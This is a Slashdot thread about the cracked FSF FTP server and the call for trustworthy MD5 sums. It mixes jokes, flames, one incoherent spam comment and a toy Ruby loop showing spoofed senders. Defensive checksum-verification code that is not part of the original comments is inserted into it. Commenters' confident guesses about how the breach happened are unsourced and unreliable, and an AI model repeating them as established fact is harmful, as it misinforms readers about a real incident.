
FSF FTP Site Cracked, Looking for MD5 Sums

CmdrTaco posted more than 11 years ago | from the two-scoops-of-paranoia dept.

GNU is Not Unix 752

landley writes "The Free Software Foundation's FTP site at ftp.gnu.org has been "compromised", and they don't seem to have full backups. They've yanked a bunch of recent packages (and their whole alpha.gnu.org ftp site), and when I asked about it they responded 'Our FTP server was compromised, yes. We are beginning to find good MD5sums for files which have not yet been restored, and they will be available again Real Soon Now. If you can provide MD5sums for any of the files listed in MISSING-FILES, it would be very much appreciated.'" Update: The FSF has a statement on the FTP site explaining the matter.


Correct MD5s (4, Funny)

Henry V .009 (518000) | more than 11 years ago | (#6686911)

Sure, I've got the "correct" MD5s right here. You trust me, don't you?

Re:Correct MD5s (4, Insightful)

brechmos (679454) | more than 11 years ago | (#6686960)

Yeah, but if enough people send in the same MD5 sums for each file, then it "should be" easy to confirm it is correct or not.

Surely, there aren't that many dishonest people, and if there were, then it would be hard for them all to get together and come up with the same MD5.

Re:Correct MD5s (4, Insightful)

Henry V .009 (518000) | more than 11 years ago | (#6687060)

The man of the million email addresses replies: Are they confirming MD5s in person, or over the phone, or by other electronic means? You have yet to master the art of paranoia, grasshopper.

Re:Correct MD5s (1)

Merk (25521) | more than 11 years ago | (#6687086)

(1..5000).each do |i|
  sender = "gnu_fan#{i}@yahoo.com"
  # ...
end

All it takes is one clever dishonest person. Until PGP signatures become commonplace and people are able to build up a web of trust, it's pretty easy to fake this sort of thing using email.

Re:Correct MD5s (1)

brechmos (679454) | more than 11 years ago | (#6687179)

Yeah, but, surely it wouldn't be that hard to parse through a list of email addresses and MD5 and see which ones you can "trust". We do that every day with spam filters.

ouch, saw this yesterday (3, Informative)

Barbarian (9467) | more than 11 years ago | (#6686917)

Did you know that some files are just about impossible to get anywhere else?

Re:ouch, saw this yesterday (0)

Anonymous Coward | more than 11 years ago | (#6687013)

ah - the wonderful stable world of lunix - this is sure to encourage thoughtful businesses to run their critical operations on this software.

Re:ouch, saw this yesterday (1)

FifteenSquids (647416) | more than 11 years ago | (#6687061)

I was unaware that Linux (the kernel) provided FTP services...

Blame FSF's poor sysadmin skills. (0)

Anonymous Coward | more than 11 years ago | (#6687020)

If they can't keep proper backups of things then they have the wrong people (and perhaps software) running the site.

Re:ouch, saw this yesterday (5, Funny)

gearheadsmp (569823) | more than 11 years ago | (#6687111)

Look no further than across the pond [mirror.ac.uk], my friend! Faster downloads than iBiblio, and it's run by this guy [gentoo.org]. So dig [mirror.ac.uk] in [mirror.ac.uk]!

Have a floppy? (1, Insightful)

John Paul Jones (151355) | more than 11 years ago | (#6686922)

How hard is it to script a backup of MD5 sums to removable media? Sheesh.

the $64,000 question: (1, Funny)

BobTheLawyer (692026) | more than 11 years ago | (#6686927)

was the server running NT?

Re:the $64,000 question: (0)

robslimo (587196) | more than 11 years ago | (#6686979)

According to netcraft.com, it's running Linux.

The compromise was probably a weak password or an inside job.

Re:the $64,000 question: (3, Insightful)

gazbo (517111) | more than 11 years ago | (#6687048)

Or maybe, JUST FUCKING MAYBE, Linux isn't some sort of magical bug free OS where every buffer is checked, every race condition averted, and every service that runs on it is guaranteed bug free.

Good God. The fact you can post that comment...no. You're just too much of an unthinking hero-worshipping idiot for me to finish. Yes, it was an inside job or a weak password. Anything except a vulnerability. Yes.

Re:the $64,000 question: (1)

ceejayoz (567949) | more than 11 years ago | (#6687143)

*claps*

Re:the $64,000 question: (0)

Anonymous Coward | more than 11 years ago | (#6687171)

Social engineering is a highly effective crack method. It also leaves fewer traces than a technical crack.

Someone doesn't have to be a zealot to start off with the working assumption that it was a social engineering crack rather than a technical failure in some OS component.

Can the invective until there's more evidence, please.

Re:the $64,000 question: (3, Insightful)

Trigun (685027) | more than 11 years ago | (#6687077)

The compromise was probably a weak password or an inside job.

Which is why syslog should be on another secure computer, and dumped to paper in a locked room for high-security sites.

It won't help the recovery, but helps pinpoint the intrusion

Mirrors? (3, Interesting)

ryan76 (666210) | more than 11 years ago | (#6686930)

Are there no mirrors of this site?

Re:Mirrors? (1)

Deadbolt (102078) | more than 11 years ago | (#6687054)

That was my first thought too. There must be some mirrors that didn't update, or have the last known good copy of these files. I assume mirroring was shut off as soon as they discovered the breach. Some server in Russia somewhere has the known good distributions.

In Soviet Russia (-1, Offtopic)

JeffTL (667728) | more than 11 years ago | (#6687152)

GNU mirrors YOU!

Re:Mirrors? (4, Informative)

gearheadsmp (569823) | more than 11 years ago | (#6687166)

Mirror [gnu.org], mirror [mirror.ac.uk] on the wall, who is the fastest of them all?

Lot'sa files (1, Informative)

guido1 (108876) | more than 11 years ago | (#6686932)

They need lots of help... There are 689 files on the list...

Eek!

Missing (-1, Redundant)

Anonymous Coward | more than 11 years ago | (#6686936)

The file MSBLAST.EXE seems to be missing from the server, as it seems to run an Illegal SCO Operating System instead of IIS. MD5SUM: 5ae700c1dffb00cef492844a4db6cd69

Base64 encoded:


Any word on how the crackers got in? (1, Interesting)

Squeezer (132342) | more than 11 years ago | (#6686937)

how did the crackers break into the ftp site? anyone know?

Re:Any word on how the crackers got in? (2, Funny)

Anonymous Coward | more than 11 years ago | (#6687017)

how did the crackers break into the ftp site? anyone know?

someone guessed the root password "itsGNUlinux!!!"

Re:Any word on how the crackers got in? (1)

Chess_the_cat (653159) | more than 11 years ago | (#6687079)

Considering that FTP passwords are transmitted as plain text over the network it probably wasn't too hard.

It's FTP, need you ask? (0)

Anonymous Coward | more than 11 years ago | (#6687099)

Never, ever, EVER run an FTP server - you are committing suicide by doing so. You are asking in big bold block letters posting your IP to slashdot to get hacked. Always make your files available to the public via HTTP/SSL in a chroot filesystem that is set no-write. Uploading of new files should be via SMTP (through trusted hosts) w/ PGP or worst-case (if you're a usability freak) (OpenSSH) SSH2 + SFTP.

People use solutions other than this. I do not understand why outside of willful stupidity.

--Ryv

Re:It's FTP, need you ask? (1)

Electrum (94638) | more than 11 years ago | (#6687118)

Never, ever, EVER run an FTP server - you are committing suicide by doing so.

Anonymous FTP is fine.

Re:Any word on how the crackers got in? (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#6687107)

They figured out what the user id and password were. Or are. Think they might have changed them by now?

Geeks are not very bright. They just think they are.

mod away pudknockers

Well that's good and all, but (1, Interesting)

dodell (83471) | more than 11 years ago | (#6686938)

How was the site cracked? What have they done to patch it? Was it GNU software? :-D Are they writing patches for this software? MORE NEWS.

Re:Well that's good and all, but (5, Informative)

rkz (667993) | more than 11 years ago | (#6687019)

Crackers exploited this [debian.org] vulnerability, there was even a patch available!!

Oh crap (2, Insightful)

Anonymous Coward | more than 11 years ago | (#6686939)

GNU is the definitive location of loads of packages. Virtually everyone who uses Linux is potentially affected. It's as if Windows Update were cracked. I don't see anything on the main GNU page yet though...

Ouch (-1, Offtopic)

kindbud (90044) | more than 11 years ago | (#6686942)

First Post?

Wait? I thought Linux was Secure?? (2, Insightful)

FortKnox (169099) | more than 11 years ago | (#6686945)

I'll wait while the "wind0ze suX0rs!" 1337 Hackors try to make this sound insignificant to linux, but can blow up on MS when a virus is released.

Just a healthy reminder that nothing is 100% secure, so no point in pointing fingers (on MS OR linux).

Re:Wait? I thought Linux was Secure?? (0)

Anonymous Coward | more than 11 years ago | (#6686970)

Linux is secure. It's GNU/Linux that isn't!

[rimshot]

Re:Wait? I thought Linux was Secure?? (2, Informative)

saskwach (589702) | more than 11 years ago | (#6687049)

I think you want OpenBSD [openbsd.org] ...7 years running, 1 remote hole in the default install. (I think it was patched within 3 days, but am too lazy to look it up.)

Not 100%, but 99.9%, sure.

Re:Wait? I thought Linux was Secure?? (2, Insightful)

JeffTL (667728) | more than 11 years ago | (#6687069)

It IS insignificant as far as security is concerned, because it's almost certainly an inside job or a password theft. It'd be insignificant even if it were on an MS-DOS webserver. The only reason this is on /., or is significant in any way, is that GNU is the victim and evidently they haven't been doing proper backups.

Finnishing move (4, Funny)

palad1 (571416) | more than 11 years ago | (#6686948)

After getting their FTP server rammed in the sockets, I bet the maintainers of ftp.gnu.org will be just more than happy to go through a good ol' slashdotting because someone _has_ to convert urls into hyperlinks for his /. submission.

I know, I clicked on the link :)

SCO (4, Funny)

Amon Re (102766) | more than 11 years ago | (#6686952)

Hmm odd...one day they speak of taking sco support out of gcc, the next their ftp server gets comprised, interesting.

Re:SCO (0)

Anonymous Coward | more than 11 years ago | (#6686993)

Yeah, I do find it hard to believe that GNU would be a target for crackers. I mean why attack an organisation that is giving you something for nothing!

The kids of today eh?

Re:SCO (1)

dr_dank (472072) | more than 11 years ago | (#6687139)

gcc had a secretary named SCO and SCO had a secretary named gcc. Oliver Stone, where are you?

Can someone please tell me... (-1, Flamebait)

anaesthesis (667111) | more than 11 years ago | (#6686963)

What FTP server were they running? Was it a Microsoft FTP server? Because the guy who runs Linux down at my school says that only M$ (he seems insistent on using the dollar sign, for some reason) servers get hacked. He told me to use "open source" servers because they are secure, and stable, "unlike their Windows counterparts." Was he lying?

Re:Can someone please tell me... (2, Interesting)

Planesdragon (210349) | more than 11 years ago | (#6687033)

Was he lying?

Only as much as a priest of a false religion is lying.

Microsoft servers _do_ get hacked more than Linux servers, but this is because there are far more MS servers of an identical configuration than there are Linux servers. They also tend to crash more--especially IIS.

So, Linux does get hacked, and there have been viruses written for Linux--but there are far far more hackers and virus-writers aimed at MS Windows as opposed to Linux.

Re:Can someone please tell me... (2, Informative)

E-Rock (84950) | more than 11 years ago | (#6687068)

Well no OS is proof against shitty passwords or real bad practices (like not running backups). As usual the most important factor is the quality of your admin, not the OS.

Obg. (5, Funny)

Rosonowski (250492) | more than 11 years ago | (#6686964)

"Real men don't use backups, they post their stuff on a public ftp server and let the rest of the world make copies." - Linus Torvalds

Another CLE? (1, Funny)

NetNinja (469346) | more than 11 years ago | (#6686965)

Career Limiting Event?

Let me get this straight.... (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#6686969)

Stallman wants us to listen to his people, and do what he says....when the Bitkeeper people keep backups?

Of course, if this was a MS site that was (2, Insightful)

Anonymous Coward | more than 11 years ago | (#6686972)

'compromised', the /. crowd would be laughing their heads off. Just goes to show that 'open source' or 'free software' isn't 100%, and the "no backups" just goes to show that poor sysadmin skills are not limited to proprietary platforms.

I have the files (5, Funny)

Zabu (589690) | more than 11 years ago | (#6686973)

But due to some sort of weird computer problem my machine keeps on restarting...


I will get around to fixing it sometime next week.

Re:I have the files (0)

ikkonoishi (674762) | more than 11 years ago | (#6687098)

If you use windows you probably have the blaster virus.

Check your task manager for something called "msblast.exe"

If you have it go here [zdnet.co.uk]

Put your glove on (3, Funny)

Zabu (589690) | more than 11 years ago | (#6687165)

Then next time you will catch the joke...

So apache no invulnerable then... (-1, Troll)

ColdGrits (204506) | more than 11 years ago | (#6686974)

...if this was a site hosted on IIS, then we would already be flooded with posts laughing at how insecure M$ systems are and gloating how this doesn't happen with open source systems.

Yet here we have a site which one would have expected to be rather well secured, and it's been cracked.

I guess that blows the "Apache is absolutely secure" myth.

Re:So apache no invulnerable then... (1)

Garfunkel (3569) | more than 11 years ago | (#6687018)

Can you please point me as to where it says Apache was cracked? Please? If you'd even glanced at even the summary it says "FTP server", Apache is not an FTP server.
I guess this blows the "slashdotters know what they are talking about" myth. Oh wait......

Re:So apache no invulnerable then... (1)

Directrix1 (157787) | more than 11 years ago | (#6687116)

Who here believes Apache is absolutely secure? I see vulnerability/exploit reports fairly frequently.

Re:So apache no invulnerable then... (1)

kpansky (577361) | more than 11 years ago | (#6687027)

Apache? What the hell are you talking about? This was an FTP breach. Absolutely nothing to do with Apache.

Re:So apache no invulnerable then... (1)

PepsiProgrammer (545828) | more than 11 years ago | (#6687041)

Yes, but I'm not of anyone who claims their software is "absolutely secure" and from what has been said so far it is not apache that has been cracked (http) but their ftp server (I am unaware what ftp server they run) What makes people complain about how insecure MS systems is the fact that the insecurities occur much more often than in open source equivalents, and that ms is generally MUCH slower to patch the vulnerabilities

Re:So apache no invulnerable then... (0)

Anonymous Coward | more than 11 years ago | (#6687046)

apache is an HTTP server, we're discussing an FTP server issue

Re:So apache no invulnerable then... (1)

jyak (112533) | more than 11 years ago | (#6687047)

Actually....it doesn't. They have not said if the ftp software was vulnerable or if it was actually hacked. They only said the ftp server was compromised. Someone unauthorized could have gained access to the server. Who knows....

Re:So apache no invulnerable then... (0)

Anonymous Coward | more than 11 years ago | (#6687073)

we need a RTFA (and please understand the motherfucker before you post) moderation

Re:So apache no invulnerable then... (1)

gowen (141411) | more than 11 years ago | (#6687078)

I guess that blows the "Apache is absolutely secure" myth
Hmmm. Apache is a Web server. The FSF had their FTP server cracked -- I don't know which they use, possibly wu-ftpd. I don't think this reflects on Apache at all.

But then, unlike you, sir, I am not an idiot.

Re:So apache no invulnerable then... (1)

rokzy (687636) | more than 11 years ago | (#6687090)

you claim there's no gloating when open source is hacked, but this is one of many gloats to this effect already posted.

Re:So apache no invulnerable then... (1)

reddfoxx (534534) | more than 11 years ago | (#6687101)

You do realize that Apache is a http server don't you? If you are serving FTP through your webserver I think that you have more problems than whether the software is secure.

Re:So apache no invulnerable then... (1)

chef_raekwon (411401) | more than 11 years ago | (#6687140)

maybe i missed something, but isn't the problem with an ftp server? and probably one that was not chrooted??

what the hell does this have to do with apache? IIS has an ftp module...of course..and it IS laughable...

so what gives? what'd I miss?
is the parent just an i D 10 T?

Re:So apache no invulnerable then... (0)

Anonymous Coward | more than 11 years ago | (#6687163)

is the parent just an i D 10 T?
Bingo!

apache? (2, Insightful)

DreadSpoon (653424) | more than 11 years ago | (#6687147)

What does apache, an http server, have to do with their ftp server being cracked?

But no, Apache isn't 100% secure. There is no such 100% server, except one unplugged from the net, encased in titanium, and buried beneath the Pacific seabed.

Silly GNU (1)

beefdart (520839) | more than 11 years ago | (#6686977)

The site ftp.gnu.org is running Apache/1.3.26 (Unix) Debian GNU/Linux mod_python/2.7.8 Python/2.1.3 on Linux

tsk, tsk..

Re:Silly GNU (0)

Anonymous Coward | more than 11 years ago | (#6687134)

[Using same reasoning as many IIS complaints post here over the last several years]

See - you can't trust open source software! The stuff is buggy as #ell and is very insecure. Even important sites for the open source community can not protect themselves...

Seriously though, Isn't it funny that everyone is being so quiet about what OS and FTP server they were using. What's wrong - afraid of a little criticism?

Isn't it time that we, as a community, started pointing out that even the best system is impossible to completely secure. It is easy to take cheap shots at Microsoft. However, as LINUX becomes more widely used more people will be looking for ways to exploit it.

This happened days ago (1)

jaymzter (452402) | more than 11 years ago | (#6686980)

I've been working on a LinuxFromScratch installation, and was perplexed as to why none of the packages I needed were available. The whole alpha.gnu.org thing set me back for a while too. Thankfully I found a debian mirror with (hopefully) good packages

BSD Ports trees should have them (5, Informative)

lactose99 (71132) | more than 11 years ago | (#6686986)

Taking a brief glance over my FreeBSD server, all of the entries in the Ports tree have the MD5SUMs in the "files" file. The Ports tree includes many many FSF software package installs.

Re:BSD Ports trees should have them (5, Informative)

lactose99 (71132) | more than 11 years ago | (#6687010)

Oops... it's the "distinfo" file that contains the MD5SUMs, not "files".

Re:BSD Ports trees should have them (0)

Anonymous Coward | more than 11 years ago | (#6687058)

ditto for gentoo.
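
Added example (not part of any comment in this thread, and not FSF or FreeBSD code): a Python sketch of the cross-check this sub-thread points at, where a checksum is accepted only when independently held lists, such as a ports `distinfo` file and a mirror's md5sum listing, agree, and any disagreement blocks the file instead of being outvoted. File names, source labels, the quorum of 2 and the sample bytes are constructed for illustration; MD5 appears only because it is what the thread discusses.

```python
"""Corroborate MD5 sums across independently held lists before trusting one."""
import hashlib
import hmac
import re
from collections import defaultdict

# "MD5 (name) = digest" as in a ports distinfo file; "digest  name" as md5sum prints.
BSD_LINE = re.compile(r"^MD5 \((?P<name>[^)]+)\) = (?P<digest>[0-9a-fA-F]{32})$")
GNU_LINE = re.compile(r"^(?P<digest>[0-9a-fA-F]{32}) [ *](?P<name>\S.*)$")


def parse_checksums(text):
    """Return {filename: lowercase md5 hex} for every recognised line."""
    sums = {}
    for raw in text.splitlines():
        line = raw.strip()
        match = BSD_LINE.match(line) or GNU_LINE.match(line)
        if match:
            sums[match.group("name")] = match.group("digest").lower()
    return sums


def corroborate(sources, quorum=2):
    """Combine checksum lists keyed by a label for where each list was held.

    A label stands for a copy you obtained yourself (ports tree, mirror,
    offline backup), not for an e-mail sender, so one party cannot add labels.
    Result per file: ("accepted", digest), ("insufficient", digest) when fewer
    than `quorum` lists mention it, or ("conflict", {digest: [labels]}).
    """
    seen = defaultdict(lambda: defaultdict(list))  # name -> digest -> labels
    for label, text in sources.items():
        for name, digest in parse_checksums(text).items():
            seen[name][digest].append(label)

    verdicts = {}
    for name, by_digest in seen.items():
        if len(by_digest) > 1:
            # Disagreement is never settled by majority: hold the file back.
            detail = {d: sorted(labels) for d, labels in by_digest.items()}
            verdicts[name] = ("conflict", detail)
            continue
        digest, labels = next(iter(by_digest.items()))
        status = "accepted" if len(labels) >= quorum else "insufficient"
        verdicts[name] = (status, digest)
    return verdicts


def verify(data, name, verdicts):
    """True only if `name` has an accepted digest and `data` hashes to it."""
    status, digest = verdicts.get(name, ("unknown", None))
    if status != "accepted":
        return False
    return hmac.compare_digest(hashlib.md5(data).hexdigest(), digest)


# Constructed sample data: stand-in file contents and three checksum lists.
SAMPLE_A = b"constructed stand-in for example-a-1.0.tar.gz"
SAMPLE_B = b"constructed stand-in for example-b-1.0.tar.gz"
SAMPLE_C = b"constructed stand-in for example-c-1.0.tar.gz"
GOOD_A = hashlib.md5(SAMPLE_A).hexdigest()
GOOD_B = hashlib.md5(SAMPLE_B).hexdigest()
GOOD_C = hashlib.md5(SAMPLE_C).hexdigest()
ALTERED_B = hashlib.md5(SAMPLE_B + b" (altered copy)").hexdigest()

SOURCES = {
    "ports-distinfo": (
        f"MD5 (example-a-1.0.tar.gz) = {GOOD_A}\n"
        f"MD5 (example-b-1.0.tar.gz) = {GOOD_B}\n"
    ),
    "mirror-md5sums": (
        f"{GOOD_A}  example-a-1.0.tar.gz\n"
        f"{ALTERED_B}  example-b-1.0.tar.gz\n"
        f"{GOOD_C}  example-c-1.0.tar.gz\n"
    ),
    "offline-backup": f"{GOOD_A.upper()} *example-a-1.0.tar.gz\n",
}

if __name__ == "__main__":
    results = corroborate(SOURCES)
    for filename in sorted(results):
        print(filename, results[filename][0])
    print("a verifies:", verify(SAMPLE_A, "example-a-1.0.tar.gz", results))
    print("b verifies:", verify(SAMPLE_B, "example-b-1.0.tar.gz", results))
```
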

As the "license" says (0)

Anonymous Coward | more than 11 years ago | (#6686988)

There is no warranty, we are not responsible, etc.

See:

http://www.infoworld.com/article/03/08/06/HNgplunenforceable_1.html

for problems with the GPL from the German and EU point of view.

morons monitoring other phonIE #'s, PostBlock(tm) (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#6686991)

devise, cracked again, still infactdead.

there's some rumour afoot that fuddles is not the only fox in the henhouse/sheep shearing shed.

the 'value' of va lairIE/robbIE's payper pawnshop increased in 'value' by 25 million dollars yesterdaze.

must be due to the smashing sucksass of the patentdead PostBlock devise, .combined with the ip rights to the saykrud kode of the SourceForgerIE(tm).

no wonder the pumping&dumping is so exciting for the damnned. that's a lotta spendolas to acquire for doing nothing. also easy to see how bullined faith works, if you look. small wonder they pretend that there is no stock markup, unless they're attacking their rivals.

the lights are coming up now.

you can pretend all you want. our advise is to be as far away from the walking dead contingent as possible, when the big flash occurs. you wouldn't want to get any of that evile on you.

as to the free unlimited energy plan, as the lights come up, more&more folks will stop being misled into sucking up more&more of the infant killing barrolls of crudeness, & learn that it's more than ok to use newclear power generated by natural (hydro, solar, etc...)methods. of course more information about not wasting anything/behaving less frivolously is bound to show up, here&there.

cyphering how many babies it costs for a barroll of crudeness, we've decided to cut back, a lot, on wasteful things like giving monIE to felons, to help them destroy the planet/population.

no matter. the #1 task is planet/population rescue. the lights are coming up. we're in crisis mode. you can help.

the unlimited power (such as has never been seen before) is freely available to all, with the possible exception of the aforementioned walking dead.

consult with/trust in yOUR creator. more breathing. vote with yOUR wallet. seek others of non-aggressive intentions/behaviours. that's the spirit, moving you.

pay no heed/monIE to the greed/fear based walking dead.

each harmed innocent carries with it a bad toll. it will be repaid by you/us. the Godless felons will not be available to make reparations.

pay attention. that's definitely affordable, plus you might develop skills which could prevent you from being misled any further by phonIE ?pr? ?firm? generated misinformation.

good work so far. there's still much to be done. see you there. tell 'em robbIE.

the rest of the wwworld is laughing/crying at/for US in sympathy/disgust, as we fall/jump into the daze of the georgewellian corepirate nazi life0cide, whilst criticizing their ip gangsters, which are also members of the walking dead.

Where's the snide comments from the /. editors? (1, Insightful)

Anonymous Coward | more than 11 years ago | (#6686995)

Oh wait, this wasn't a Microsoft site that was cracked and failed to make full backups, it was the Free Software Foundation. Does this mean I can't look forward to michael writing a one-liner in the story header showing that this proves that you can't rely on Free Software?

Oops! (3, Funny)

TypoNAM (695420) | more than 11 years ago | (#6686996)

Hate it when that happens...

Who wants to sell off some MD5 checksums off ebay? Let's make a few dollars! :D

Anyone know *when* this happened? (1)

daoine (123140) | more than 11 years ago | (#6687003)

I noticed that the emacs package for XP (had to reinstall the thing, again) was missing last week, but I really didn't think very much of it. But that would mean it was cracked a significant amount of time ago...

Surprising that there hasn't been much news of it.

This is a conspiracy (5, Funny)

palad1 (571416) | more than 11 years ago | (#6687004)

When looking at the missing files:
gnu/windows/emacs/21.2/leim-21.2-src.tar.gz
gnu/windows/emacs/21.2/emacs-21.2-barebin-i386.tar.gz
gnu/windows/emacs/21.2/emacs-21.2-bin-i386.tar.gz
gnu/windows/emacs/21.2/emacs-21.2-fullbin-i386.tar.gz
gnu/windows/emacs/21.2/emacs-21.2-leim.tar.gz
gnu/windows/emacs/21.2/emacs-21.2-lisp.tar.gz
gnu/windows/emacs/21.2/emacs-21.2-src.tar.gz
gnu/windows/emacs/21.2/emacs-21.2-undumped-i386.tar.gz

the list goes on and on and...
now, grep for 'vi' : nothing, nada, null.

Of course, what do you think? This is a conspiracy orchestrated by VI lovers, to wipe out EMACS from the face of earth!

Kettle. Pot. Black. (0)

Anonymous Coward | more than 11 years ago | (#6687009)

Yea, Free Software is so much more secure than Microsoft.

Go Apple!

Checksums? (1)

aggressivepedestrian (149887) | more than 11 years ago | (#6687012)

If you can provide MD5sums for any of the files listed in MISSING-FILES, it would be very much appreciated.
Uh, am I missing something? If I cracked your site, put a file on it, and then you asked the world for valid MD5 sums, wouldn't I be more than willing to give you the MD5 sum for the bogus file?

Re:Checksums? (0)

Anonymous Coward | more than 11 years ago | (#6687127)

I would hope they would wait until more than just one MD5SUM came in per package and checked them against each other....
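The cross-checking idea from the two comments above, as an added example that is not part of the thread: it tallies submitted MD5 sums per file, counts each source once, and refuses any file with conflicting reports instead of taking a majority vote. The file names, contents, source labels and the quorum of two are constructed assumptions.

```python
import hashlib
from collections import defaultdict

def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

# Constructed sample data: file names, contents and source labels are made up.
GOOD_A = md5_hex(b"constructed contents of pkg-a")
GOOD_B = md5_hex(b"constructed contents of pkg-b")
BAD_B = md5_hex(b"constructed trojaned pkg-b")
GOOD_C = md5_hex(b"constructed contents of pkg-c")
SUBMISSIONS = [
    ("mirror-1", "pkg-a.tar.gz", GOOD_A),
    ("user-cd", "pkg-a.tar.gz", GOOD_A.upper()),  # same sum, different case
    ("mirror-1", "pkg-b.tar.gz", GOOD_B),
    ("user-cd", "pkg-b.tar.gz", GOOD_B),
    ("unknown-mail", "pkg-b.tar.gz", BAD_B),      # one dissenting report
    ("mirror-1", "pkg-c.tar.gz", GOOD_C),
    ("mirror-1", "pkg-c.tar.gz", GOOD_C),         # repeat from the same source
]

def classify(submissions, quorum=2):
    """Return {path: (status, digest)}; status is agreed, unconfirmed or conflict."""
    votes = defaultdict(lambda: defaultdict(set))
    for source, path, digest in submissions:
        votes[path][digest.lower()].add(source)   # a set counts each source once
    decisions = {}
    for path, by_digest in votes.items():
        if len(by_digest) > 1:
            # Any disagreement blocks the file: a majority vote would let
            # whoever sends the most reports decide.
            decisions[path] = ("conflict", None)
            continue
        (digest, sources), = by_digest.items()
        status = "agreed" if len(sources) >= quorum else "unconfirmed"
        decisions[path] = (status, digest)
    return decisions

def verify(data: bytes, path: str, decisions) -> bool:
    """Accept a restored file only if its sum matches an agreed digest."""
    status, digest = decisions.get(path, ("unknown", None))
    return status == "agreed" and md5_hex(data) == digest

if __name__ == "__main__":
    for path, (status, digest) in sorted(classify(SUBMISSIONS).items()):
        print(f"{path}: {status} {digest or ''}")
```

The quorum counts source labels, so it is only as strong as the check that those labels belong to separate, authenticated parties; many reports from one sender under different names would still reach "agreed".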

Late news (2, Informative)

coleSLAW (23358) | more than 11 years ago | (#6687016)

Move along folks, nothing to see here. alpha.gnu.org was cracked many months ago.

headline (5, Funny)

Lxy (80823) | more than 11 years ago | (#6687022)

if you understand the headline

FSF FTP Site Cracked, Looking for MD5 Sums

You just might be a geek.

Time to hit those logs (1)

rf0 (159958) | more than 11 years ago | (#6687025)

and see what's been installed from where.. Ho hum

Rus

This pisses me off more than it should. (5, Interesting)

Deadbolt (102078) | more than 11 years ago | (#6687029)

Okay, this kind of shit makes me want to start throwing bricks. Cracking the GNU FTP server? Is nothing sacred anymore? I feel like someone burned down a church.

They've done so much for humanity and some utter twit decides to compensate for his bad childhood by taking their server down.

*goes off to dock another point from his faith in humanity*

So what if I compromised the site... (1)

Roached (84015) | more than 11 years ago | (#6687030)

...and sent my MD5 sum?

They never heard of... (1)

Yaa 101 (664725) | more than 11 years ago | (#6687035)

Mirror sites and rsync? One would think that the FSF has professional help for these kinds of things...

You're Kidding? (5, Insightful)

System Control (690846) | more than 11 years ago | (#6687036)

The Free Software Foundation's FTP site at ftp.gnu.org has been "compromised", and they don't seem to have full backups.

Unbelievable. And I'm supposed to trust their methods and products with my enterprise?

Re:You're Kidding? (4, Insightful)

Lxy (80823) | more than 11 years ago | (#6687154)

While your post is somewhat trollish, I have to agree that this is an interesting predicament for the FSF. To save face, I hope they post a detailed account of how they were cracked, and own up to their mistakes so they can all teach us what not to do. That's the power of openness :-)

Any other ways to help? (1, Offtopic)

mschoolbus (627182) | more than 11 years ago | (#6687039)

I will donate a CDR if that helps you keep your little files...

It's hard to believe something like this actually happened, especially to the FSF... You would think... never mind

That is awful... (3, Insightful)

Badanov (518690) | more than 11 years ago | (#6687050)

I run a coupla Linux boxes at work and a couple at home, and I swear I don't even take a dump unless I am certain I have backups.

Having just read the above, let me add: Let a thousand jokes be posted!

Trusted mirrors with the MD5 sums? (1)

gspr (602968) | more than 11 years ago | (#6687056)

Surely there must be some mirrors that are 100% trusted? Run by GNU staff, and such?

GNu is Unsecure (-1, Offtopic)

DrSkwid (118965) | more than 11 years ago | (#6687071)

nt

FSF FTP mirror here: (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#6687082)

ftp.sco.com

Top Five Ways For The Linux Zealot To Deal With It (-1, Troll)

Anonymous Coward | more than 11 years ago | (#6687088)

5. "Free Software Foundation did not make Linux"
4. "AaAAAAAaaaAAAAAaaAAA!"
3. Discuss technical issues regarding backups, effectively ignoring that the #1 Property Of Stallman Approved server was violated and disgraced
2. "Windows Still Sucks"
1. Tell everyone that Gates did it by selling hardware with built-in security flaws to the FSF through clandestine channels, going all the way up to You Know Who

obvious conclusion (0, Funny)

Anonymous Coward | more than 11 years ago | (#6687094)

/puts on tinfoil hat/

BUSH/ASHCROFT/CIA haxored it and put trojans in all GNU software. They are using it to track people down and send them to Gitmo!!!

I bet SCO knows something about this.. (0, Flamebait)

dBLiSS (513375) | more than 11 years ago | (#6687115)

Just yesterday there was a story running about FSF talking about pulling SCO support. I bet the slick SCO fellahs had nothing to do with this...

Obligatory Simpson's Quote (0)

Anonymous Coward | more than 11 years ago | (#6687123)

GNUDoh!

If this had been an open source ftp server (4, Funny)

Stalemate (105992) | more than 11 years ago | (#6687161)

We would already be flooded with posts about how if this were a Microsoft server we would already be flooded with posts bashing Microsoft and talking about....oh, right, my bad.

wuftpd is trouble, use ProFTPD (1)

bigberk (547360) | more than 11 years ago | (#6687172)

Why not use ProFTPD [linux.co.uk]? It has a much better security track record than wuftpd, and is actively developed. Considering all the roots that happen from default wuftpd installs, one of the first things I recommend to linux newbies is to scrap wuftpd. And setting up a chroot environment is as easy as one directive: "DefaultRoot ~"